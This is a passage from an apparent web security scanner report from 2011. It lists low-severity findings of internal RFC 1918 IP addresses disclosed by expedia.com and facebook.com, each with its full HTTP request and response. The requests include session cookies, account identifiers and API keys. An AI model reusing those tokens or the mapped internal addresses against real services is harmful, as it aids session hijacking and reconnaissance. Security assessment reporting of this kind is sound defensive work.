Cookie: ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; jscript=1; s1=`user=v.8,0,EX01D44B82B4$F4$B5201000I$27$E96!G0.!5010$2302!50$5C$E9$88i$97$D0$2D$37!4$FF!e02000`95; p1=`tpid=v.1,1`accttype=v.2,3,1,EX01833E44F8$E8$24$DD$0C$AB$A2$18$37$25$18$F1$B6$8Ak$16$E6$24i$5B$39$8B$91H`104

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Fri, 06 May 2011 22:44:13 GMT
Connection: keep-alive
Connection: Transfer-Encoding
Content-Length: 97787


                                                                                       <DIV ID="ttDiv" STYLE="position:absolute; visibility:hi
...[SNIP]...
<!--TS (1/0[CID=0]) compress=1,3 log=0 BR:04000001101010110010012001010000000, Srvr=10.186.8.170, Req=15:44:12(:702), Rsp=15:44:12(:905), hash=11(0x157d5588) ET=203ms Dur=203ms Mif=0 -->
...[SNIP]...
28.49. https://www.expedia.com/pub/agent.dll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.expedia.com
Path:   /pub/agent.dll

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

POST /pub/agent.dll HTTP/1.1
Host: www.expedia.com
Connection: keep-alive
Referer: https://www.expedia.com/pub/agent.dll?qscr=logi&hsuc=&fram=&uurl=qscr%3Dlitn%26&ussl=&uact=4&slgn=&zz=1304739350624
Cache-Control: max-age=0
Origin: https://www.expedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; jscript=1; srvys=v.1%2C2%2C0; iEAPID=000,; JSESSION=cd179693-3938-4927-a337-d893911cc853; p1=`gacct=v.1,1,215819496`tpid=v.1,1`airp=v.1,AUS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`98; s1=`0`user=v.8,0,EX01652EAB1Fp$B7201000h$27$E96!G0.!5010$2302!50$16$1A$99$91$8A$1Cs$EC!4$FF!e02000`95; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dexpedia1%253D%252526pid%25253DHTX_LOGIN%252526pidt%25253D1%252526oid%25253Djavascript%2525253AISULGuest%25252528%25252529%252526ot%25253DA%2526undefinedtoJSONString%252CtoJSONString%253Dfunction%252520%252528%252529%25257Bvar%252520a%25253D%25255B%252522%25257B%252522%25255D%25252Cb%25252Ck%25252Cv%25253Bfunction%252520p%252528s%252529%25257Bif%252528b%252529%25257Ba.push%252528%252522%25252C%252522%252529%25253B%25257D%25250Aa.push%252528k.toJSONString%252528%252529%25252C%252522%25253A%252522%25252Cs%252529%25253Bb%25253Dtrue%25253B%25257D%25250Afor%252528k%252520in%252520this%252529%25257Bif%252528this.hasOwnProperty%252528k%252529%252529%25257Bv%25253Dthis%25255Bk%25255D%25253Bswitch%252528typeof%252520v%252529%25257Bcase%252522object%252522%25253Aif%252528v%252529%25257Bif%252528typeof%252520v.toJSONString%25253D%25253D%25253D%252522function%252522%252529%25257Bp%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257Delse%25257Bp%252528%252522null%252522%252529%25253B%25257D%25250Abreak%25253Bcase%252522string%252522%25253Acase%252522number%252522%25253Acase%252522boolean%252522%25253Ap%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257D%25257D%25250Aa.push%252528%252522%25257D%252522%252529%25253Breturn%252520a.join%252528%252522%252522%252529%25253B%25257D%3B
Content-Length: 153

tccb=1&ussl=1&qscr=logi&subl=0&lmde=537&uact=8&uurl=qscr%3Dlitn%26&fram=&wdth=&hght=&itlo=0&gpid=061734C81E05&slnk=&flag=&tmpu=&selc=2&fnui=1&rfrr=-54397

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Fri, 06 May 2011 22:45:56 GMT
Connection: keep-alive
Connection: Transfer-Encoding
Set-Cookie: s1=`0`user=v.8,0,EX01BAF66508p$B7202000$90$27$E96$33m$9D$0D$33m$9D$0D$33m$9D$0D10001000$1E810$2302!50$F6$2EH$96$BAa$21$ABl$3D$E2$F7!e02000`minfo=v.5,EX011966D151$F2$24$DD$0C$AC1pBt$2E$32h$93$60$30S$D3$97k9$B11$F6$14NdOaT$33$3Cl$40$8E1$8C$2Ah$EA$9B$0En$DC$C2$0B$284$96$30Bt0$5D`accttype=v.2,8,1,EX01A128AA98$F2$24$DD$0C$B11p$5Ft$2E$36h$9F$60$3CS$D3$97k9$BF1$F6$15NqUaT1$3C`368; Domain=.expedia.com; path=/
Set-Cookie: p1=`gacct=v.1,1,215819496`tpid=v.1,1`linfo=v.4,Guest|0|0|255|1|0||||||||0|0|0||0|0|0|-1|-1`group=v.1,0`99; expires=Sunday, 31-Dec-2016 23:59:59 GMT; Domain=.expedia.com; path=/
Content-Length: 43168


                                                                           <META HTTP-EQUIV="Content-Type" content="text/html; c
...[SNIP]...
<!--TS (1/0[CID=0]) compress=1,3 log=0 BR:04000001101010110010012001010000000, Srvr=10.186.8.115, Req=15:45:56(:816), Rsp=15:45:56(:847), hash=11(0x157d5588) ET=31ms Dur=31ms Mif=22841784304 -->
...[SNIP]...
28.50. https://www.expedia.com/pub/agent.dll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.expedia.com
Path:   /pub/agent.dll

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /pub/agent.dll?qscr=fbak&&zz=1247500409281&&zz=1304754553695 HTTP/1.1
Host: www.expedia.com
Connection: keep-alive
Referer: http://www.expedia.com/pub/agent.dll?qscr=fbak&&zz=1247500409281
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipsnf3=v.3|US|1|511|washington; aspp=v.1,0||||||||||||; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; MC1=GUID=cc3450d747f3e2d59e058691af6ba2d1; p1=`accttype=v.2,3,1,EX01EF947B7C$D1$25$DD$0C$FD$A0Y$B3$7D8$95B$1C$91$5DIR$81$2Al$1C$86$5D$CDU$2Cv$7B$8A`tpid=v.1,1`gacct=v.1,1,215819729`linfo=v.4,|0|0|255|1|0||||||||0|0|0||0|0|0|-1|-1`airp=v.1,AUS`196; COOKIECHECK=1; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dexpedia1%253D%252526pid%25253DFAQ%25252520Support%2525253ASearch%25252520Results%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.expedia.com/pub/agent.dll%2525253Fqscr%2525253Dfbak%25252526%25252526zz%2525253D1247500409281%252526ot%25253DA%2526undefinedtoJSONString%252CtoJSONString%253Dfunction%252520%252528%252529%25257Bvar%252520a%25253D%25255B%252522%25257B%252522%25255D%25252Cb%25252Ck%25252Cv%25253Bfunction%252520p%252528s%252529%25257Bif%252528b%252529%25257Ba.push%252528%252522%25252C%252522%252529%25253B%25257D%25250Aa.push%252528k.toJSONString%252528%252529%25252C%252522%25253A%252522%25252Cs%252529%25253Bb%25253Dtrue%25253B%25257D%25250Afor%252528k%252520in%252520this%252529%25257Bif%252528this.hasOwnProperty%252528k%252529%252529%25257Bv%25253Dthis%25255Bk%25255D%25253Bswitch%252528typeof%252520v%252529%25257Bcase%252522object%252522%25253Aif%252528v%252529%25257Bif%252528typeof%252520v.toJSONString%25253D%25253D%25253D%252522function%252522%252529%25257Bp%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257Delse%25257Bp%252528%252522null%252522%252529%25253B%25257D%25250Abreak%25253Bcase%252522string%252522%25253Acase%252522number%252522%25253Acase%252522boolean%252522%25253Ap%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257D%25257D%25250Aa.push%252528%252522%25257D%252522%252529%25253Breturn%252520a.join%252528%252522%252522%252529%25253B%25257D%3B; jscript=1; s1=`user=v.8,0,EX0184330AB4$0E$F3204000$2A$2F$E96$32i$A00$32i$A00$32i$A001000$31000$1E310$220$0D!50i$5Cr$A7$18$25$98$EF$82$AB$89$FB!e02000`135

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Sat, 07 May 2011 02:49:20 GMT
Connection: keep-alive
Connection: Transfer-Encoding
Set-Cookie: s1=`user=v.8,0,EX0152A505E4$0E$F3205000$2B$2F$E96$32i$A00$32i$A00$32i$A001000$31000$1E310$220$0D!50$D1$D2Ao1$86$81$5B$82$AB$89$FB!e02000`133; Domain=.expedia.com; path=/
Set-Cookie: p1=`accttype=v.2,3,1,EX01EF947B7C$D1$25$DD$0C$FD$A0Y$B3$7D8$95B$1C$91$5DIR$81$2Al$1C$86$5D$CDU$2Cv$7B$8A`tpid=v.1,1`gacct=v.1,1,215819729`airp=v.1,AUS`linfo=v.4,|0|0|255|1|0||||||||0|0|0||0|0|0|-1|-1`196; expires=Sunday, 31-Dec-2016 23:59:59 GMT; Domain=.expedia.com; path=/
Content-Length: 155628


                                                                           <META HTTP-EQUIV="Content-Type" content="text/html; c
...[SNIP]...
<!--TS (1/0[CID=0]) compress=1,3 log=0 BR:04000001101010110010012001010000000, Srvr=10.186.8.150, Req=19:49:20(:677), Rsp=19:49:20(:833), hash=83(0x557d5588) ET=156ms Dur=156ms Mif=0 -->
...[SNIP]...
28.51. http://www.facebook.com/SocialFollow  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /SocialFollow

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /SocialFollow HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2; lsd=dh9j6; reg_ext_ref=http%3A%2F%2Fwww.socialfollow.com%2F; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2FSocialFollow; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmedia%2Fset%2F%3Fset%3Dpa.82321587255; wd=1066x968

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.199.49
X-Cnection: close
Date: Fri, 06 May 2011 17:41:49 GMT
Content-Length: 33424

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...
28.52. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=172521166094230&app_id=172521166094230&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df23989fffc%26origin%3Dhttp%253A%252F%252Fwww.lbmc.com%252Ff272969f4%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfca4e7094%26origin%3Dhttp%253A%252F%252Fwww.lbmc.com%252Ff272969f4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df29680494%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3d094e62c%26origin%3Dhttp%253A%252F%252Fwww.lbmc.com%252Ff272969f4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df29680494&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df142697f18%26origin%3Dhttp%253A%252F%252Fwww.lbmc.com%252Ff272969f4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df29680494&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfe38d1044%26origin%3Dhttp%253A%252F%252Fwww.lbmc.com%252Ff272969f4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df29680494&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.lbmc.com/service/human-resources-0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.111.31
X-Cnection: close
Date: Sat, 07 May 2011 01:18:37 GMT
Content-Length: 58

Given URL is not allowed by the Application configuration.
28.53. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=85b6ec633ce86a49c565375254dbc550&extern=0&channel=http%3A%2F%2Fallatsea.net%2Fby-category%2FCruising%3Ffbc_channel%3D1&locale=en_US HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://allatsea.net/by-category/Cruising
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.142.129
X-Cnection: close
Date: Fri, 06 May 2011 21:10:06 GMT
Content-Length: 58

Given URL is not allowed by the Application configuration.
28.54. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=85b6ec633ce86a49c565375254dbc550&extern=0&channel=http%3A%2F%2Fallatsea.net%2Fdirectclassifieds.php%3FmenuCategories%3D8%26fbc_channel%3D1&locale=en_US HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://allatsea.net/directclassifieds.php?menuCategories=8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.141.115
X-Cnection: close
Date: Fri, 06 May 2011 21:10:31 GMT
Content-Length: 58

Given URL is not allowed by the Application configuration.
28.55. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=131538103586818&app_id=131538103586818&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfa8cb0018%26origin%3Dhttp%253A%252F%252Fwww.expedia.com%252Ff7077cb88%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df13ecb18e%26origin%3Dhttp%253A%252F%252Fwww.expedia.com%252Ff7077cb88%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df18017249%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df107a5d97%26origin%3Dhttp%253A%252F%252Fwww.expedia.com%252Ff7077cb88%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df18017249&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df13aee53c4%26origin%3Dhttp%253A%252F%252Fwww.expedia.com%252Ff7077cb88%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df18017249&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df27f859d44%26origin%3Dhttp%253A%252F%252Fwww.expedia.com%252Ff7077cb88%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df18017249&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/default.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f13aee53c4&origin=http%3A%2F%2Fwww.expedia.com%2Ff7077cb88&relation=parent&transport=postmessage&frame=f18017249
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.48.51
X-Cnection: close
Date: Fri, 06 May 2011 22:35:21 GMT
Content-Length: 0

28.56. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=172521166094230&app_id=172521166094230&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfe2a797b8%26origin%3Dhttp%253A%252F%252Fwww.lbmc.com%252Ff2e0f83fbc%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2a2b81fd%26origin%3Dhttp%253A%252F%252Fwww.lbmc.com%252Ff2e0f83fbc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1f7edd888%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df10f84d54c%26origin%3Dhttp%253A%252F%252Fwww.lbmc.com%252Ff2e0f83fbc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1f7edd888&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2b969698c%26origin%3Dhttp%253A%252F%252Fwww.lbmc.com%252Ff2e0f83fbc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1f7edd888&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df124d30d84%26origin%3Dhttp%253A%252F%252Fwww.lbmc.com%252Ff2e0f83fbc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1f7edd888&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.lbmc.com/service/audit-and-assurance/managed-security
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.51.79
X-Cnection: close
Date: Sat, 07 May 2011 01:18:42 GMT
Content-Length: 58

Given URL is not allowed by the Application configuration.
28.57. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=131538103586818&app_id=131538103586818&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df39d156af4%26origin%3Dhttp%253A%252F%252Fwww.expedia.com%252Ffa054297%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2931fed3%26origin%3Dhttp%253A%252F%252Fwww.expedia.com%252Ffa054297%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df10bcdcacc%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dff11c76d8%26origin%3Dhttp%253A%252F%252Fwww.expedia.com%252Ffa054297%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df10bcdcacc&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df33b8f6fc4%26origin%3Dhttp%253A%252F%252Fwww.expedia.com%252Ffa054297%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df10bcdcacc&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2b46cd664%26origin%3Dhttp%253A%252F%252Fwww.expedia.com%252Ffa054297%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df10bcdcacc&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/default.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f33b8f6fc4&origin=http%3A%2F%2Fwww.expedia.com%2Ffa054297&relation=parent&transport=postmessage&frame=f10bcdcacc
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.212.61
X-Cnection: close
Date: Sat, 07 May 2011 11:25:03 GMT
Content-Length: 0

28.58. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

